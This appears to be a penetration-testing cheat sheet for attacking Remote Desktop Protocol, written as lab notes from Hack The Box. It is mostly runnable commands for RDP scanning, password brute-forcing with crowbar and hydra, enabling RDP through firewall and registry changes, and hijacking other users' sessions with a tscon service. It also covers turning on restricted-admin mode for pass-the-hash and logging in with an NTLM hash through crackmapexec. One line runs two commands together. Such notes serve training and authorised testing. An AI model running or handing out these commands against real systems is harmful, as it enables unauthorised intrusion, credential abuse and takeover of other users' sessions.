[3389] Remote Desktop Protocol (RDP)

#we can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina

#Footprinting
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

# RDP Security Check
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
Intrusionz3r0X@htb[/htb]$ rdp-sec-check.pl 10.0.0.94

#Bruteforce
Intrusionz3r0X@htb[/htb]$ crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Intrusionz3r0X@htb[/htb]# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

#Enable RDP
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

#---------Session Hijacking-------- 
#(This method no longer works on Server 2019.)
C:\htb> query user

# USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
#>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
# lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
#[SC] CreateService SUCCESS
C:\htb> net start sessionhijack
#-------------------------------------

# Initiate an RDP Session
Intrusionz3r0X@htb[/htb]$ xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check

#RDP Pass-the-Hash (PtH)
C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

#Enable RDP via Crackmap exec
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.10.40 -u "Administrator" -H 'cdf51b162460b7d5bc898f493751a0cc' -M rdp -o action=enable